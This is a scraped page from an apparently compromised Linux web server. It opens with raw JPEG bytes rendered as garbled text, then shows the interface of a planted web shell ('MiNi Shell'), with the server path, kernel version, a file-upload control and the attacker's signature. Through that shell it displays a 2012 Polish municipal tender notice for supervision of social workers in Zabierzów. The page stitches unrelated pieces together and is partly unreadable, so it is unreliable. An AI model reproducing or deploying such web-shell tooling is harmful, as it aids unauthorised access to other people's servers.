JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120118/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120118/17262-N-2012.html

<p class="kh_header"><b>Zabierzów: Świadczenie usługi w zakresie superwizji indywidualnej dla pracowników socjalnych realizujących  projekt -Ku samodzielności - praca systemowa z rodziną zagrożoną wykluczeniem społecznym- współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego i superwizji grupowej dla zespołu specjalistów zaangażowanych w realizację projektu</b><br>
<b>Numer ogłoszenia: 17262 - 2012; data zamieszczenia: 18.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej  w Zabierzowie , ul. Cmentarna 2, 32-080 Zabierzów, woj. małopolskie, tel. 12 397 52 44; 12 285 14 13, faks 12 285 14 13.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gops.zabierzow.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi w zakresie superwizji indywidualnej dla pracowników socjalnych realizujących  projekt -Ku samodzielności - praca systemowa z rodziną zagrożoną wykluczeniem społecznym- współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego i superwizji grupowej dla zespołu specjalistów zaangażowanych w realizację projektu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Świadczenie usługi w zakresie superwizji indywidualnej dla pracowników socjalnych realizujących  projekt -Ku samodzielności - praca systemowa z rodziną zagrożoną wykluczeniem społecznym- współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego 
i superwizji grupowej dla zespołu specjalistów zaangażowanych w realizację projektu.
Projekt realizowany jest przez Gminny Ośrodek Pomocy Społecznej w Zabierzowie w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII Promocja integracji społecznej, Działania 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałania 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.

ZAKRES ZAMÓWIENIA OBEJMUJE:
a) opracowanie założeń superwizji indywidualnych i grupowych, 
b) świadczenie usługi superwizji indywidualnej dla 8 pracowników socjalnych realizujących projekt,
c) świadczenie usługi superwizji grupowej dla grupy specjalistów,
d) weryfikację dokumentacji pracy socjalnej w projekcie, 
e) promocję standardów pracy socjalnej w Ośrodku

1. ZAŁOŻENIA DOTYCZĄCE SUPERWIZJI INDYWIDUALNEJ:

1.1. Superwizja indywidualna świadczona będzie w ilości średnio 16 godzin zegarowych miesięcznie dla 8 pracowników socjalnych, dla każdego pracownika po 2 godziny miesięcznie. Zamawiający przewiduje, że w okresie trwania umowy wykonawca wykona usługi superwizji indywidualnej w ilości nie przekraczającej 192 godziny.
1.2. Wsparcie świadczone będzie w okresie od dnia podpisania umowy do dnia 20 grudnia 2012 roku lub do wyczerpania limitu godzin dla całego okresu świadczenia usługi - określonego w ust. 1.1.
1.3. Wykonawca wyświadczy superwizji indywidualnej nie więcej niż 192 godziny w całym okresie świadczenia wsparcia, średnio 16 godzin wsparcia miesięcznie, z wyjątkiem stycznia gdzie liczba ta może być mniejsza.
1.4. Ilość godzin usług świadczonych miesięcznie może ulec zwiększeniu lub zmnijszeniu w okresie każdego miesiąca kalendarzowego.
1.5. Ilość godzin usług zrealizowanych w okresie trwania umowy może, z przyczyn niezależnych od Zamawiającego ulec zmniejszeniu, lecz nie więcej niż o 10% godzin (19,5 godzin). W takim przypadku Wykonawcy przysługuje wyłącznie wynagrodzenie za wykonane godziny pracy.
1.6. Zakres tematyczny spotkań: superwizja pracy socjalnej w ramach projektu, wsparcie 
w tworzeniu planów pomocy rodzinie oraz kontraktów socjalnych.
1.7. Czas świadczenia usługi nie przekroczy limitu godzin, przeznaczonego na rzecz danego pracownika socjalnego (2 godziny miesięcznie). W uzasadnionych przypadkach Wykonawca może wydłużyć czas trwania usługi na rzecz pracownika socjalnego, jednakże każdorazowo jest zobowiązany powiadomić Zamawiającego.
1.8. Usługi świadczone będą w GOPS Zabierzów, od poniedziałku do piątku w godzinach pracy Ośrodka, po wcześniejszym uzgodnieniu terminu z Kierownikiem Projektu, zgodnie z ustalonym co miesięcznym harmonogramem.

2. ZAŁOŻENIA DOTYCZĄCE SUPERWIZJI GRUPOWEJ:

2.1. Superwizja grupowa świadczona będzie w ilości średnio 4 godziny zegarowe raz na kwartał dla zespołu specjalistów. Zamawiający przewiduje, że w okresie trwania umowy Wykonawca wykona usługi w zakresie superwizji grupowej nie przekraczającej 16 godzin. 
2.2. Wsparcie świadczone będzie w okresie od dnia podpisania umowy do dnia 20 grudnia 2012 roku lub do wyczerpania limitu godzin dla całego okresu świadczenia usługi - określonego w ust.2.1
2.3. Wykonawca superwizji grupowej wykona nie więcej niż 16 godzin w całym okresie świadczenia wsparcia, średnio po 4 godziny wsparcia raz na kwartał.
2.4. Zakres tematyczny spotkań dotyczyć będzie współpracy instytucji przy tworzeniu planów pomocy rodzinie oraz wypracowaniu stałego modelu współpracy pomiędzy instytucjami szeroko rozumianej pomocy społecznej w Gminie Zabierzów. 
2.5. Terminy i miejsce spotkań każdorazowo uzgadniane będą z uczestnikami superwizji. 
OGÓLNE ZASADY REALIZACJI USŁUGI:
1. Świadczenie przedmiotu zamówienia będzie odbywało się z wykorzystaniem osób wskazanych w ofercie przez Wykonawcę do realizacji niniejszego zamówienia zgodnie z wytycznymi przekazanymi Wykonawcy przez upoważnionego pracownika GOPS Zabierzów.
2. W celu prawidłowej realizacji usługi Wykonawca będzie: 
- współpracował z pracownikami Zamawiającego w zakresie wykonanych zadań w szczególności w zakresie wymiany informacji, podejmowania wspólnych działań z pracownikami projektu, konsultacji, 
- współpracował z pracownikami socjalnymi Gminnego Ośrodka Pomocy Społecznej w Zabierzowie i zespołem specjalistów w rozwiązywaniu problemów uczestników, a także w opracowywaniu i realizacji kontraktów socjalnych oraz umów udziału w projekcie,
- organizował i prowadził raz na kwartał spotkanie grupowe specjalistów zaangażowanych w realizację projektu (superwizjach grupowych zespołów specjalistów)
- prowadził dokumentację związaną z realizacją projektu systemowego - Ku samodzielności - praca systemowa z rodziną zagrożoną wykluczeniem społecznym- (tj. Miesięczna karta czasu pracy pracownika zatrudnionego w ramach PO KL, oraz inną dokumentację związaną z realizacją projektu a wynikającą z dokumentów programowych i wytycznych Programu Operacyjnego Kapitał Ludzki),
- wykonywał inne czynności zlecone przez Kierownika projektu w ramach zajmowanego stanowiska,
3. Wykonawca będzie zobowiązany do wypełnienia zadań w zakresie oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki: wszystkie dokumenty związane z realizacją usługi oznaczone będą logiem Unii Europejskiej, EFS i PO KL oraz informacją: - Projekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego -, zgodnie z Wytycznymi Ministerstwa Rozwoju Regionalnego dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki
4. Wykonawca zobowiązany będzie umożliwić Zamawiającemu w każdym momencie świadczenia usługi wgląd do dokumentów związanych z realizacją usługi oraz umożliwić koordynowanie oraz monitorowanie doradztwa przez Zamawiającego.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zwiększenie godzin superwizji grupowej.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na podstawie złożonych przez Wykonawcę dokumentów zbada czy dokumenty te potwierdzają wymóg spełnienia warunków określony przez
Zamawiającego. W przypadku, gdy wymóg spełnienia warunków zostanie potwierdzony przedłożonymi dokumentami warunek zostanie uznany za spełniony. Natomiast, gdy wymóg spełnienia warunków nie zostanie potwierdzony w dokumentach złożonych przez Wykonawcę, warunek zostanie uznany za niespełniony.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Jako spełniający warunki udziału w postępowaniu zostaną uznani wykonawcy, którzy wykażą przeprowadzenie co najmniej 300 godzin superwizji dla pracowników socjalnych z Ośrodków Pomocy Społecznej w ostatnich trzech latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.
Ocena spełniania warunku zostanie dokonana wg formuły: spełnia - nie spełnia, na podstawie złożonego przez Wykonawcę:
- oświadczenia o spełnianiu warunków udziału w postępowaniu,
- wykazu wykonanych usług,
- dokumentów potwierdzających, że usługi te zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien dysponować sobą/osobami, z których każda musi spełniać łącznie poniższe wymagania:

1. posiadać wykształcenie wyższe psychologiczne lub na kierunku praca socjalna,
2. posiadać tytuł superwizora, poświadczony certyfikatem,
3. posiadać ukończone szkolenia (potwierdzone stosownymi zaświadczeniami) - w zakresie pracy metodą Podejścia Skoncentrowanego na Rozwiązaniach (SFA) w pomocy społecznej,
4. posiadać ukończony zawansowany kurs metody Wideotreningu Komunikacji VIT (potwierdzenie stosownym zaświadczeniem)
5.posiadać doświadczenie zawodowe w zakresie ostatnich trzech lat przed upływem terminu składania ofert - przeprowadzenie min. 300 godzin superwizji dla pracowników socjalnych z Ośrodków Pomocy Społecznej,
6. posiadać znajomość zagadnień związanych z pomocą społeczną - min. 5-cio letni staż w placówkach pomocy społecznej
Ocena spełniania warunku zostanie dokonana wg formuły: spełnia - nie spełnia, na podstawie złożonego przez Wykonawcę:
- oświadczenia o spełnianiu warunków udziału w postępowaniu,
- wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami,
-oświadczenia, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają  wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana postanowień niniejszej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, jest dopuszczalna w szczególnie uzasadnionych przypadkach, na zasadach wskazanych w pkt. 2 - 8. 
2. Zmiana może być wprowadzona jedną z następujących metod:
a). Wykonawca może zaproponować zmianę przez złożenie pisemnej propozycji zmiany, która zdaniem Wykonawcy w razie przyjęcia pozwoli skrócić okres realizacji umowy lub obniży koszty realizacji umowy lub w inny sposób będzie korzystna dla Zamawiającego, 
b). Zamawiający może przedłożyć propozycję zmiany, jeżeli jej wprowadzenie jest konieczne dla prawidłowej realizacji Projektu, i która w razie przyjęcia pozwoli skrócić okres realizacji umowy lub obniży koszty realizacji umowy lub w inny sposób będzie korzystna dla Zamawiającego lub jeżeli konieczność jej wprowadzenia wynika z decyzji krajowych lub zagranicznych Instytucji zarządzających i monitorujących realizację Projektu, ze zmiany prawa lub ze zmiany okoliczności, której nie można było przewidzieć w chwili zawarcia umowy.
3. Każda ze stron przedkładając drugiej stronie propozycję zmiany, spełniającą wymogi określone w ust. 2, wraz z tą propozycją przedłoży: 
a). opis proponowanej zmiany,
b). zakres proponowanej zmiany, 
c). szacunki, czy i w jaki sposób zakładana zmiana wpłynie na termin realizacji Przedmiotu umowy, oraz
d). szacunki dotyczące wpływu zmiany na wynagrodzenie należne Wykonawcy wraz z uzasadnieniem. 
4. Po otrzymaniu propozycji, Wykonawca albo Zamawiający (w zależności od przypadku) w terminie 3 dni zatwierdzi bądź odrzuci otrzymaną propozycję zmiany bądź w tym terminie wystąpi do strony występującej z propozycją zmiany, przesyłając zmodyfikowaną propozycję zmiany, spełniającą wymogi opisane w ust. 3. 
5. W przypadku upływu terminu podanego w ust 4, traktuje się, iż propozycja wprowadzenia zmiany została odrzucona.
6. Do przesłanej zmodyfikowanej propozycji zmiany mają zastosowanie postanowienia ust. 4-5.
7. Każda zmiana do umowy wymaga formy pisemnej i musi być dokonana poprzez sporządzenie zmiany do Umowy - Aneksu. 
8. Zmiana umowy dokonana z naruszeniem postanowień ust. 1- 7 jest nieważna.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gops.zabierzow.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej w Zabierzowie ul. Cmentarna 2,  32 - 080 Zabierzów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.01.2012 godzina 11:00, miejsce: Gminny Ośrodek Pomocy Społecznej w Zabierzowie ul. Cmentarna 2, , 32-080 Zabierzów - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt realizowany jest przez Gminny Ośrodek Pomocy Społecznej
w Zabierzowie w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII Promocja integracji społecznej, Działania 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałania 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com